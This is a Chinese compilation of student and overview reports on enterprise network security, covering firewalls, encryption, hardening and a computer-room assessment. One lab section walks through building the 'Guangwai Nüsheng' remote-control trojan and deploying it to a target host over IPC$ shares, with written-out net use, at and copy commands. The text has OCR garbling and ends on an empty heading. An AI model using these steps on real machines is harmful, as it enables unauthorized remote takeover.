第一篇:【企业网络】网络信息安全报告
XX中型企业网安全 网络信息安全报告
一、实验目的及要求
该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。
本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解(了解Windows的使用,具有键盘操作和文件处理的基础),并已经掌握计算机网络的基本原理。
二、专周内容
1、安全需求分析
(1)网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:
A、公开服务器的安全保护 B、防止黑客从外部攻击 C、入侵检测与监控 D、病毒防护 E、数据安全保护 F、网络的安全管理
(2)解决网络安全问题的一些要求
A、大幅度地提高系统的安全性(重点是可用性和可控性);
B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置;
C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;
D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;
E、安全保密系统具有较好的性能价格比。一次性投资,可以长期使用;
F、安全产品具有合法性,及经过国家有关管理部门的认可或认证;
(3)系统安全目标
A、建立一套完整可行的网络安全与网络管理策略;
B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信;
C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;
D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度;
E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;
F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;
2、网络拓扑
3、网络安全的基本内容
(1)基本网络命令
A、ping命令: ping –t IP,向指定的计算机不停的发送数据包,按Ctr+Break快捷键可以查看统计信息并继续运行,按 Ctr+C可中止运行。
B、Tracert命令:tracert IP 显示从本地计算机到目标服务器所经过的计算机:
C、pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
(2)操作系统安全
A、屏蔽不需要的服务组件
开始——程序——管理工具——服务 出现以下窗口:
然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用”,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享:“开始”——“程序”——“管理工具”——“服务”——“Server”
(3)数据库系统安全
A、使用安全的帐号策略和Windows认证模式
由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。
SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候,应该对指向SQL Server的连接要求Windows身份验证模式。
Windows认证模式比混合模式更优越,原因在以下:
1)它通过限制对Microsoft Windows用户和域用户帐户的连接,保护SQL Server免受大部分Internet工具的侵害。
2)服务器将从Windows安全增强机制中获益,例如更强的身份验证协议以及强制的密码复杂性和过期时间。
3)使用Windows认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。
4)Windows认证意味着你只需要将密码存放在一个地方。
要在SQL Server的Enterprise Manager安装Windows身份验证模式,步骤操作: 展开服务器组——右键点击服务器——然后点击“属性”——在安全性选项卡的身份验证中——点击“仅限Windows”。(4)网络防火墙工具:红墙主机网络防火墙 安装
1.具体操作如下:
第一步: 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器,运行根目录下的Setup文件来运行其安装程序,进入“爱思红墙主机网络防火墙安装”窗口;
第二步:
在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮;
第三步: 在“软件许可协议”对话框,接受协议点击“是”;
第四步: 点击“是”按钮,出现显示您计算机的相关信息,即判断是否可以安装本软件;
第五步: 单击“下一步”按钮,出现“选择目标位置”对话框;
第六步: 在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;
第七步: 单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;
第八步: 单击“下一步”按钮,系统开始复制文件;
第九步: 进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。
相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。
点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:
网络监控中心:
(5)网络攻击工具:“广外女生”
它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟WINDOWS的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便;屏幕控制方面:可以自定义图片的质量来减少传输的时间,在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘,就像操纵自己的计算机一样;远程任务管理方面,可以直观地浏览对方窗体,随意杀掉对方窗体或其中的控件;其他功能还有邮件IP通知等。
主要步骤:首先运行“gwg.exe”,出现如图窗口:
选中“服务端设置”,生成“GDUFS.exe”木马:
然后将“GDUFS.exe”复制到自己的C盘中,再根据一些命令把“GDUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP:191.168.12.38 具体步骤及命令:
“开始”——“运行”——“cmd”
命令:net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系
命令:net time 191.168.12.38 获取目标主机的时间
命令:at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道
命令:copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中:
命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。
三、专周小结:
通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。
网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。
网络安全又分为内网安全和外网安全。在内外网安全中,内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。
至于在将来的工作中,我们也要严格尊市网络设备管理原则和使用秩序,对设备进行统一管理专人负责,严格要求自己对设备进行安全操作,保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:
1,及时准确判断网络故障,做好上门维护工作或及时提醒网络合作商进行维护。
2,定期检查维护各网络设备的运行情况并进行维护。3,不定期对服务器进行更新和检查。
4,遇到特殊情况,及时向领导和老师汇报,努力提高应急处理问题和独立处理问题的能力。
感谢老师对我们的教导。
第二篇:企业网络信息安全解决方案
企业网络信息安全解决方案
一、信息安全化定义
企业信息安全管理即针对当前企业面临的病毒泛滥、黑客入侵、恶意软件、信息失控等复杂的应用环境制定相应的防御措施,保护企业信息和企业信息系统不被未经授权的访问、使用、泄露、中断、修改和破坏,为企业信息和企业信息系统提供保密性、完整性、真实性、可用性、不可否认性服务。简而言之,使非法者看不了、改不了信息,系统瘫不了、信息假不了、行为赖不了。
二、企业信息安全管理现状
当前企业在信息安全管理中普遍面临的问题:
(1)缺乏来自法律规范的推动力和约束;
(2)安全管理缺乏系统管理的思想。被动应付多于主动防御,没有做前期的预防,而是出现问题才去想补救的办法,不是建立在风险评估基础上的动态的持续改进的管理方法;
(3)重视安全技术,忽视安全管理。企业愿意在防火墙等安全技术上投资,而相应的管理水平、手段没有体现,包括管理的技术和流程,以及员工的管理;
(4)在安全管理中不够重视人的因素;(5)缺乏懂得管理的信息安全技术人员;
(6)企业安全意识不强,员工接受的教育和培训不够。
三、企业信息安全管理产品
建立完善的企业信息安全管理系统,必须内外兼修,一方面要防止外部入侵,另一方面也要防范内部人员泄密可能。所以在选择企业信息安全管理产品时,必须是一个完整的体系结构。目前,在市场上比较流行,而又能够代表未来发展方向的安全产品大致有以下几类:用户身份认证,如静态密码、动态密码(短信密码、动态口令牌、手机令牌)、USB KEY、IC卡、数字证书、指纹虹膜等。
防火墙
即访问控制系统,它在内部网络与不安全的外部网络之间设置障碍,阻止外界对内部资源的非法访问,防止内部对外部的不安全访问。但它其本身可能存在安全问题,也可能会是一个潜在的瓶颈。
安全路由器
由于WAN连接需要专用的路由器设备,因而可通过路由器来控制网络传输。通常采用访问控制列表技术来控制网络信息流。
安全服务器
安全服务器主要针对一个局域网内部信息存储、传输的安全保密问题,其实现功能包括对局域网资源的管理和控制,对局域网内用户的管理,以及局域网中所有安全相关事件的审计和跟踪。
安全管理中心
由于网上的安全产品较多,且分布在不同的位置,这就需要建立一套集中管理的机制和设备,即安全管理中心。它用来给各网络安全设备分发密钥,监控网络安全设备的运行状态,负责收集网络安全设备的审计信息等。
入侵检测系统(IDS)
入侵检测,作为传统保护机制(比如访问控制,身份识别等)的有效补充,形成了信息系统中不可或缺的反馈链。
入侵防御系统(IPS)
入侵防御,入侵防御系统作为IDS很好的补充,是信息安全发展过程中占据重要位置的计算机网络硬件。
安全数据库
由于大量的信息存储在计算机数据库内,有些信息是有价值的,也是敏感的,需要保护。安全数据库可以确保数据库的完整性、可靠性、有效性、机密性、可审计性及存取控制与用户身份识别等。
数据容灾设备
数据容灾作为一个重要的企业信息安全管理体系中的一个重要补救措施,在整个企业信息安全管理体系中有着举足轻重的作用。数据容灾设备包括数据恢复设备、数据复制设备、数据销毁设备等。目前应用较多的数据容灾设备包括效率源HD Doctor、Data Compass数据指南针、Data Copy King硬盘复制机、开盘机等。
编辑本段企业信息安全管理对策 1.网络管理
一般企业网与互联网物理隔离, 因而与互联网相比, 其安全性较高, 但在日常运行管理中我们仍然面临网络链路维护、违规使用网络事件等问题, 具体而言:
(1)在IP 资源管理方面, 采用IP MAC 捆绑的技术手段防止用户随意更改IP 地址和随意更换交换机上的端口。这分两种情况实现, 第一种情况是如果客户机连在支持网管的交换机上的, 可以通过网管中心的管理软件, 对该交换机远程实施Port Security 策略, 将客户端网卡MAC 地址固定绑在相应端口上。第二种情况是如果客户机连接的交换机或集线器不支持网管, 则可以通过Web 网页调用一个程序, 通过该程序把MAC 地址和IP 地址捆绑在一起。这样, 就不会出现IP 地址被盗用而不能正常使用网络的情况。
(2)在网络流量监测方面, 可使用网络监测软件对网络传输数据协议类型进行分类统计, 查看数据、视频、语音等各种应用的利用带宽, 防止频繁进行大文件的传输, 甚至发现病毒的转移及传播方向。
2.服务器管理
常见应用服务器安装的操作系统多为Windows 系列,服务器的管理包括服务器安全审核、组策略实施、服务器的备份策略。服务器安全审核是网管日常工作项目之一, 审核的范围包括安全漏洞检查、日志分析、补丁安装情况检查等, 审核的对象可以是DC、Exchange Server、SQL Server、IIS 等。
在组策略实施时, 如果想使用软件限制策略, 即哪些客户不能使用哪个软件, 则需要把操作系统升级到Windows 2003 Server。服务器的备份策略包括系统软件备份和数据库备份两部分, 系统软件备份拟利用现有的专用备份程序, 制定一个合理的备份策略, 如每周日晚上做一次完全备份, 然后周一到周五晚上做增量备份或差额备份;定期对服务器备份工作情况等。
3.客户端管理
对大多数单位的网管来说, 客户端的管理都是最头痛的问题, 只有得力的措施才能解决这个问题, 这里介绍以下几种方法:
1)将客户端都加入到域中, 这一点很重要, 因为只有这样, 客户端才能纳入管理员集中管理的范围。
2)只给用户以普通域用户的身份登录到域, 因为普通域用户不属于本地Administrators 和Power Users 组, 这样就可以限制他们在本地计算机上安装大多数软件(某些软件普通用户也可以安装)。当然为了便于用户工作, 应通过本地安全策略, 授予他们“关机”和“修改系统时间”等权利。
3)实现客户端操作系统补丁程序的自动安装。4)实现客户端防病毒软件的自动更新。
5)利用SMS 对客户端进行不定期监控, 发现不正常情况及时处理。
4.数据备份与数据加密
由于应用系统的加入, 各种数据库日趋增长, 如何确保数据在发生故障或灾难性事件情况下不丢失, 是当前面临的一个难题。这里介绍四种解决方法: 第一种解决办法是用磁带机或硬盘进行数据备份。该办法价格最低, 保存性最强, 不足之处是备份的只是某个时间点。第二种方案是采用本地磁盘阵列来分别实现各服务器的本地硬盘数据冗余。第三种方案是采用双机容错方式, 两台机器系统相互备份, 应用层数据全部放在共享的磁盘阵列柜中, 这种方式能解决单机故障或宕机的问题, 同时又能防止单个硬盘故障导致的数据丢失, 但前期投资较大。第四种方案是采用NAS 或SAN 来实现各服务器的集中区域存储, 实现较高级别的磁盘等硬件故障的数据备份, 但是成本较高, 一般不能防止系统层的故障, 如感染病毒或系统崩溃。考虑到网络上非认证用户可能试图旁路系统的情况, 如物理地“取走”数据库, 在通信线路上窃听截获。对这样的威胁最有效的解决方法就是数据加密, 即以加密格式存储和传输敏感数据。发送方用加密密钥, 通过加密设备或算法, 将信息加密后发送出去。接收方在收到密文后, 用解密密钥将密文解密, 恢复为明文。如果传输中有人窃取,他只能得到无法理解的密文, 从而对信息起到保密作用。
5.病毒防治
对防病毒软件的要求是: 能支持多种平台, 至少是在Windows 系列操作系统上都能运行;能提供中心管理工具, 对各类服务器和工作站统一管理和控制;在软件安装、病毒代码升级等方面, 可通过服务器直接进行分发, 尽可能减少客户端维护工作量;病毒代码的升级要迅速有效。在实施过程中, 本单位以一台服务器作为中央控制一级服务器, 实现对网络中所有计算机的保护和监控, 并使用其中有效的管理功能, 如: 管理员可以向客产端发送病毒警报、强制对远程客户端进行病毒扫描、锁定远程客产端等。正常情况下, 一级服务器病毒代码库升级后半分钟内, 客户端的病毒代码库也进行了同步更新。
四、企业网络、信息安全解决方案 1)大型企业
大型企业部门林立,相当一部分会在外地有分支机构,业务系统普遍采用建设虚拟专网的方式,起到外部分支访问总部数据的通道和安全加密作用。传统的网络安全设备基本都已经部署,比如防火墙,可以把企业访问互联网的风险降低,但是大型企业的网络、信息安全威胁主要来源于恶意的攻击行为和企业员工有意、无意的操作行为,致使业务系统不能正常使用,或者机密数据外泄,对企业的网络安全,信息保密造成很大的威胁,拥有功能强大的上网行为管理设备、入侵检测系统和防泄密系统能有效杜绝各个环节可能出现的不安全隐患,保障业务系统的政策正常安全运行和企业机密数据的安全。
建议大型企业在网络中部署:防火墙、IDS、上网行为管理、防泄密系统、VPN、安全服务器等。
2)中型企业
中型企业基本已具备完整的网络体系,但是企业的信息化技术力量相对大型企业可能薄弱一点,对于员工的上网行为和电脑操作行为可能要求得不会太严格,即使向员工制定了一定的管理制度,也会在制度的执行过程中因为人为的因素而变成一纸空文,所以用硬件设备来保障和规范网络、信息的安全尤为重要,中型企业的网络、信息安全威胁主要来源于外网的攻击、内部网络使用的不规范导致的木马、病毒等安全威胁。
建议中型企业部署:防火墙、IDS、路由器、上网行为管理、防泄密系统等。
3)小型企业
小型企业在人员规模、基础建设、资金实力等方面都相对落后于大中型企业,但是在发展阶段的小型企业,对网络、信息的安全问题同样不能忽视,目前各式各样的聊天工具、视频网站、网游、P2P下载等,都会直接影响到员工的工作效率,并且占用了大部分的带宽,使得业务系统和正常的工作无法得到保障,且小型企业一般不会配置专业的网管人员,这就是有的小型企业配置了好的电脑,够用的宽带,但是仍然有大部分员工一直抱怨总是不能上网,或者上网太慢,邮件发不出去等问题。从综合实力来讲,小型企业在网络、信息安全方面的投入会比较有限,建议企业配置中低端的安全设备,防火墙,上网行为管理,以研发和设计为主的企业对于防泄密系统的部署还是有必要的。
第三篇:网络信息安全
网络信息安全
信息安全是指为建立信息处理系统而采取的技术上和管理上的安全保护,以实现电子信息的保密性、完整性、可用性和可控性。当今信息时代,计算机网络已经成为一种不可缺少的信息交换工具。然而,由于计算机网络具有开放性、互联性、连接方式的多样性及终端分布的不均匀性,再加上本身存在的技术弱点和人为的疏忽,致使网络易受计算机病毒、黑客或恶意软件的侵害。面对侵袭网络安全的种种威胁,必须考虑信息的安全这个至关重要的问题。
网络信息安全分为网络安全和信息安全两个层面。网络安全包括系统安全,即硬件平台、操作系统、应用软件;运行服务安全,即保证服务的连续性、高效率。信息安全则主要是指数据安全,包括数据加密、备份、程序等。
1.硬件安全。即网络硬件和存储媒体的安全。要保护这些硬设施不受损害,能够正常工作。
2.软件安全。即计算机及其网络中各种软件不被篡改或破坏,不被非法操作或误操作,功能不会失效,不被非法复制。
3.运行服务安全。即网络中的各个信息系统能够正常运行并能正常地通过网络交流信息。通过对网络系统中的各种设备运行状况的监测,发现不安全因素能及时报警并采取措施改变不安全状态,保障网络系统正常运行。
4.数据安全。即网络中存储及流通数据的女全。要保护网络中的数据不被篡改、非法增删、复制、解密、显示、使用等。它是保障网络安全最根本的目的。
1.防火墙技术。防火墙(Firewall)是近年来发展的最重要的安全技术,它的主要功能是加强网络之间的访问控制,防止外部网络用户以非法手段通过外部网络进入内部网络(被保护网络)。它对两个或多个网络之间传输的数据包和链接方式按照一定的安全策略对其进行检查,来决定网络之间的通信是否被允许,并监视网络运行状态。简单防火墙技术可以在路由器上实现,而专用防火墙提供更加可靠的网络安全控制方法。
防火墙的安全策略有两条。一是“凡是未被准许的就是禁止的”。防火墙先是封闭所有信息流,然后审查要求通过的信息,符合条件的就让通过;二是“凡是未被禁止的就是允许的”,防火墙先是转发所有的信息,然后再逐项剔除有害的内容,被禁止的内容越多,防火墙的作用就越大。网络是动态发展的,安全策略的制定不应建立在静态的基础之上。在制定防火墙安全规则时,应符合“可适应性的安全管理”模型的原则,即:安全=风险分析+执行策略+系统实施+漏洞监测+实时响应。防火墙技术主要有以下三类:
●包过滤技术(Packct Filtering)。它一般用在网络层,主要根据防火墙系统所收到的每个数据包的源IP地址、目的IP地址、TCP/UDP源端口号、TCP/UDP目的端口号及数据包中的各种标志位来进行判定,根据系统设定的安全策略来决定是否让数据包通过,其核心就是安全策略,即过滤算法的设计。
●代理(Proxy)服务技术。它用来提供应用层服务的控制,起到外部网络向内部网络申请服务时的中间转接作用。内部网络只接受代理提出的服务请求,拒绝外部网络其它节点的直接请求。运行代理服务的主机被称为应用机关。代理服务还可以用于实施较强的数据流监控、过滤、记录等功能。
●状态监控(Statc Innspection)技术。它是一种新的防火墙技术。在网络层完成所有必要的防火墙功能——包过滤与网络服务代理。目前最有效的实现方法是采用 Check Point)提出的虚拟机方式(Inspect Virtual Machine)。
防火墙技术的优点很多,一是通过过滤不安全的服务,极大地提高网络安全和减少子网中主机的风险;二是可以提供对系统的访问控制;三是可以阻击攻击者获取攻击网络系统的有用信息;四是防火墙还可以记录与统计通过它的网络通信,提供关于网络使用的统计数据,根据统计数据来判断可能的攻击和探测;五是防火墙提供制定与执行网络安全策略的手段,它可以对企业内部网实现集中的安全管理。
防火墙技术的不足有三。一是防火墙不能防止绕过防火墙的攻击;二是防火墙经不起人为因素的攻击。由于防火墙对网络安全实施单点控制,因此可能受到黑客的攻击;三是防火墙不能保证数据的秘密性,不能对数据进行鉴别,也不能保证网络不受病毒的攻击。
2.加密技术。数据加密被认为是最可靠的安全保障形式,它可以从根本上满足信息完整性的要求,是一种主动安全防范策略。数据加密就是按照确定的密码算法将敏感的明文数据变换成难以识别的密文数据。通过使用不同的密钥,可用同一加密算法,将同一明文加密成不同的密文。当需要时可使用密钥将密文数据还原成明文数据,称为解密。
密钥加密技术分为对称密钥加密和非对称密钥加密两类。对称加密技术是在加密与解密过程中使用相同的密钥加以控制,它的保密度主要取决于对密钥的保密。它的特点是数字运算量小,加密速度快,弱点是密钥管理困难,一旦密钥泄露,将直接影响到信息的安全。非对称密钥加密法是在加密和解密过程中使用不同的密钥加以控制,加密密钥是公开的,解密密钥是保密的。它的保密度依赖于从公开的加密密钥或密文与明文的对照推算解密密钥在计算上的不可能性。算法的核心是运用一种特殊的数学函数——单向陷门函数,即从一个方向求值是容易的,但其逆向计算却很困难,从而在实际上成为不可能。
除了密钥加密技术外,还有数据加密技术。一是链路加密技术。链路加密是对通信线路加密;二是节点加密技术。节点加密是指对存储在节点内的文件和数据库信息进行的加密保护。
3.数字签名技术。数字签名(Digital Signature)技术是将摘要用发送者的私钥加密,与原文一起传送给接收者。接收者只有用发送者的公钥才能解密被加密的摘要。在电子商务安全保密系统中,数字签名技术有着特别重要的地位,在电子商务安全服务中的源鉴别、完整性服务、不可否认服务中都要用到数字签名技术。
在书面文件上签名是确认文件的一种手段,其作用有两点,一是因为自己的签名难以否认,从而确认文件已签署这一事实;二是因为签名不易仿冒,从而确定了文件是真的这一事实。数字签名与书面签名有相同相通之处,也能确认两点,一是信息是由签名者发送的,二是信息自签发后到收到为止未曾做过任何修改。这样,数字签名就可用来防止:电子信息因易于修改而有人作伪;冒用别人名义发送信息;发出(收到)信件后又加以否认。
广泛应用的数字签名方法有RSA签名、DSS签名和 Hash签名三种。RSA的最大方便是没有密钥分配问题。公开密钥加密使用两个不同的密钥,其中一个是公开的,另一个是保密的。公开密钥可以保存在系统目录内、未加密的电子邮件信息中、电话黄页上或公告牌里,网上的任何用户都可获得公开密钥。保密密钥是用户专用的,由用户本身持有,它可以对公开密钥加密的信息解密。DSS数字签名是由美国政府颁布实施的,主要用于跟美国做生意的公司。它只是一个签名系统,而且美国不提倡使用任何削弱政府窃听能力的加密软件。Hash签名是最主要的数字签名方法,跟单独签名的RSA数字签名不同,它是将数字签名和要发送的信息捆在一起,所以更适合电子商务。
4.数字时间戳技术。在电子商务交易的文件中,时间是十分重要的信息,是证明文件有效性的主要内容。在签名时加上一个时间标记,即有数字时间戳(Digita Timestamp)的数字签名方案:验证签名的人或以确认签名是来自该小组,却不知道是小组中的哪一个人签署的。指定批准人签名的真实性,其他任何人除了得到该指定人或签名者本人的帮助,否则不能验证签名
(二)网络信忽安全的目标
1.保密性。保密性是指信息不泄露给非授权人、实休和过程,或供其使用的特性。
2.完整性。完整性是指信息未经授权不能被修改、不被破坏、不被插人、不迟延、不乱序和不丢失的特性。对网络信息安全进行攻击的最终目的就是破坏信息的完整性。
3.可用性。可用性是指合法用户访问并能按要求顺序使用信息的特性,即保证合法用户在需要时可以访问到信息
4.可控性。可控性是指授权机构对信息的内容及传播具有控制的能力的特性,可以控制授权范围内的信息流向以及方式。
5.可审查性。在信息交流过程结束后,通信双方不能抵赖曾经做出的行为,也不能否认曾经接收到对方的信息。
网络信息安全面临的问题
1.网络协议和软件的安全缺陷
因特网的基石是TCP/IP协议簇,该协议簇在实现上力求效率,而没有考虑安全因素,因为那样无疑增大代码量,从而降低了TCP/IP的运行效率,所以说TCP/IP本身在设计上就是不安全的。很容易被窃听和欺骗:大多数因特网上的流量是没有加密的,电子邮件口令、文件传输很容易被监听和劫持。很多基于TCP/IP的应用服务都在不同程度上存在着安全问题,这很容易被一些对TCP/IP十分了解的人所利用,一些新的处于测试阶级的服务有更多的安全缺陷。缺乏安全策略:许多站点在防火墙配置上无意识地扩大了访问权限,忽视了这些权限可能会被内部人员滥用,黑客从一些服务中可以获得有用的信息,而网络维护人员却不知道应该禁止这种服务。配置的复杂性:访问控制的配置一般十分复杂,所以很容易被错误配置,从而给黑客以可乘之机。TCP/IP是被公布于世的,了解它的人越多被人破坏的可能性越大。现在,银行之间在专用网上传输数据所用的协议都是保密的,这样就可以有效地防止入侵。当然,人们不能把TCP/IP和其实现代码保密,这样不利于TCP/IP网络的发展。2.黑客攻击手段多样
进人2006年以来,网络罪犯采用翻新分散式阻断服务(DDOS)攻击的手法,用形同互联网黄页的域名系统服务器来发动攻击,扰乱在线商务。宽带网络条件下,常见的拒绝服务攻击方式主要有两种,一是网络黑客蓄意发动的针对服务和网络设备的DDOS攻击;二是用蠕虫病毒等新的攻击方式,造成网络流量急速提高,导致网络设备崩溃,或者造成网络链路的不堪负重。
调查资料显示,2006年初发现企业的系统承受的攻击规模甚于以往,而且来源不是被绑架的“僵尸”电脑,而是出自于域名系统(DNS)服务器。一旦成为DDOS攻击的目标,目标系统不论是网页服务器、域名服务器,还是电子邮件服务器,都会被网络上四面八方的系统传来的巨量信息给淹没。黑客的用意是借人量垃圾信息妨碍系统正常的信息处理,借以切断攻击目标对外的连线。黑客常用“僵尸”电脑连成网络,把大量的查询要求传至开放的DNS服务器,这些查询信息会假装成被巨量信息攻击的目标所传出的,因此DNS服务器会把回应信息传到那个网址。
美国司法部的一项调查资料显示,1998年3月到2005年2月期间,82%的人侵者掌握授权用户或设备的数据。在传统的用户身份认证环境下,外来攻击者仅凭盗取的相关用户身份凭证就能以任何台设备进人网络,即使最严密的用户认证保护系统也很难保护网络安全。另外,由于企业员工可以通过任何一台未经确认和处理的设备,以有效合法的个人身份凭证进入网络,使间谍软件、广告软件、木马程序及其它恶意程序有机可乘,严重威胁网络系统的安全。
有资料显示,最近拉美国家的网络诈骗活动增多,作案手段先进。犯罪活动已经从“现实生活转入虚拟世界”,网上诈骗活动日益增多。3.计算机病毒
第四篇:网络信息安全评估报告
计算机信息安全评估报告
如何
实
现
如
下
图
所
示
可用性1.人们通常采用一些技术措施或网络安全设备来实现这些目标。例如:
使用防火墙,把攻击者阻挡在网络外部,让他们“迚不来”。
即使攻击者迚入了网络内部,由于有加密机制,会使他们“改不了”和“拿不走”关 键信息和资源。
机密性2机密性将对敏感数据的访问权限控制在那些经授权的个人,只有他们才能查看数据。机密性可防止向未经授权的个人泄露信息,或防止信息被加工。
如图所示,“迚不来”和“看不懂”都实现了信息系统的机密性。
人们使用口令对迚入系统的用户迚行身份鉴别,非法用户没有口令就“迚不来”,这就保证了信息系统的机密性。
即使攻击者破解了口令,而迚入系统,加密机制也会使得他们“看不懂”关键信息。例如,甲给乙发送加密文件,只有乙通过解密才能读懂其内容,其他人看到的是乱码。由此便实现了信息的机密性。
完整性3如图所示,“改不了”和“拿不走”都实现了信息系统的完整性。使用加密机制,可以保证信息系统的完整性,攻击者无法对加密信息迚行修改或者复制。
不可抵赖性4如图所示,“跑不掉”就实现了信息系统的不可抵赖性。如果攻击者迚行了非法操作,系统管理员使用审计机制或签名机制也可让他们无所遁形
对考试的机房迚行“管理制度”评估。(1)评估说明
为规范管理,保障计算机设备的正常运行,创造良好的上机环境,必须制定相关的管理制度
(2)评估内容
没有建立相应信息系统运行管理规程、缺陷管理制度、统计汇报制度、运维流程、值班制度,没有实行工作票制度;机房出入管理制度上墙,但没有机房迚出情况记录(3)评估分析报告
所存在问题:1没有系统的相关负责人,机房也是谁人都可以自由出入。2在上机过程中做与学习无关的工作。3机房财产规划不健全等(4)评估建议
1、计算机室的管理由系统管理员负责,非机房工作人员未经允许不准迚入。未经许可不得擅自上机操作和对运行设备及各种配置迚行更改。
2、保持机房内清洁、安静,严禁机房内吸烟、吐痰以及大声喧哗;严禁将易燃、易爆、易污染和强磁物品带入机房。
3、机房内的一切物品,未经管理员同意,不得随意挪动,拆卸和带出机房。
4、上机时,应先认真检查机器情况,如有问题应及时向机房管理员反应。
5、上机人员不得在机房内迚行与上机考试无关的计算机操作。
6、上机时应按规定操作,故意或因操作不当造成设备损坏,除照价赔偿外,视情节轻重给予处罚。对考试的机房迚行“物理安全”评估。(1)评估说明
防火,防水,防尘,防腐蚀,主机房安装门禁、监控与报警系统。(2)评估内容 主机房没有安装门禁、监控系统,有消防报警系统。(3)评估分析报告
没有详细的机房配线图,机房供甴系统将动力、照明用甴与计算机系统供甴线路是分开的,机房没有配备应急照明装置,有定期对UPS的运行状况迚行检测但没有检测记录。
(4)评估建议
有详细的机房配线图,机房供甴系统将动力、照明用甴与计算机系统供甴线路分开,机房配备应急照明装置,定期对UPS的运行状况迚行检测(查看半年内检测记录)对考试的机房迚行“计算机系统安全”评估。(1)评估说明
应用系统的角色、权限分配有记录;用户账户的变更、修改、注销有记录(半年记录情况);关键应用系统的数据功能操作迚行审计幵迚行长期存储;对关键应用系统有应急预案;关键应用系统管理员账户、用户账户口令定期迚行变更;新系统上线前迚行安全性测试。
(2)评估内容
营销系统的角色、权限分配有记录,其余系统没有;用户账户的变更、修改、注销没有记录;关键应用系统的数据功能操作没有迚行审计;没有针对关键应用系统的应急预案;关键应用系统管理员账户、用户账户口令有定期迚行变更;有些新系统上线前没有迚行过安全性测试。
(3)评估分析报告
网络中的防火墙位置部署合理,防火墙规则配置符合安全要求,防火墙规则配置的建立、更改有规范申请、审核、审批流程,对防火墙日志迚行存储、备份。
(4)评估建议
完善系统的角色、权限分配有记录;记录用户账户的变更、修改、注销(半年记录情况);关键应用系统的数据功能操作迚行审计;制定针对关键应用系统的应急预案;关键应用系统管理员账户、用户账户口令定期迚行变更;新系统上线前应严格按照相关标准迚行安全性测试。
对考试的机房迚行“网络与通信安全”评估。(1)评估说明
按标准部署身份认证系统、安全管理平台、针对安全设备的日志服务器,采用漏洞扫描系统,重要系统一年迚行一次信息安全风险评估。
(2)评估内容
没有部署身份认证系统、安全管理平台,没有漏洞扫描系统,重要系统没有迚行信息安全风险评估,没有部署针对安全设备的日志服务器。
(3)评估分析报告
按标准部署身份认证系统、安全管理平台、针对安全设备的日志服务器,采用漏洞扫描系统,重要系统一年迚行一次信息安全风险评估。
(4)评估建议
部署身份认证系统、安全管理平台,采用漏洞扫描系统,重要系统一年内迚行信息安全风险评估,部署针对安全设备的日志服务器。
信息安全评估:
对考试的机房迚行“日志与统计安全”评估。(1)评估说明
每天计算机上机记录日志在册,对系统迚行不定时的还原。对本局半年内发生的较大的、或者发生次数较多的信息安全事件迚行汇总记录,形成本单位的安全事件列表
(2)评估内容
已成立了信息安全领导机构,但尚未成立信息安全工作机构。
(3)评估分析报告
局域网核心交换设备、城域网核心路由设备应采取设备冗余或准备备用设备,不允许外联链路绕过防火墙,具有当前准确的网络拓扑结构图
(4)评估建议
完善信息安全组织机构,成立信息安全工作机构。
第五篇:2011网络与信息安全情况报告
2011年网络与信息安全检查情况的报告
